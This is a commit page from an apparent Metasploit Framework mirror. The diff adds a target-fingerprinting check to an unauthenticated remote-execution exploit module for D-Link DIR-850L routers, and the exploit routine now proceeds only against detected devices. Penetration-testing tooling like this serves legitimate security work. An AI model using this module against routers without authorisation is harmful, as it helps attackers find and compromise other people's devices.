infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update dlink_850l_unauth_exec.rb

MS-2855/keylogger-mettle-extension
Austin 2017-11-04 07:58:13 -04:00 committed by GitHub
parent cddec8ca6c
commit 84599ed3fc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
modules/exploits/linux/http/dlink_850l_unauth_exec.rb
View File

@ -55,6 +55,28 @@ class MetasploitModule < Msf::Exploit::Remote
]) ])
end end
def check
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers['Server']
auth = res.headers['Server']
if auth =~ /DIR-850L/
if auth =~ /WEBACCESS\/1\.0/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def report_cred(opts) def report_cred(opts)
service_data = { service_data = {
address: opts[:ip], address: opts[:ip],
@ -197,6 +219,12 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
print_status("#{peer} - Connecting to target...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
end
# #
# Information Retrieval, obtains creds and logs in # Information Retrieval, obtains creds and logs in
# #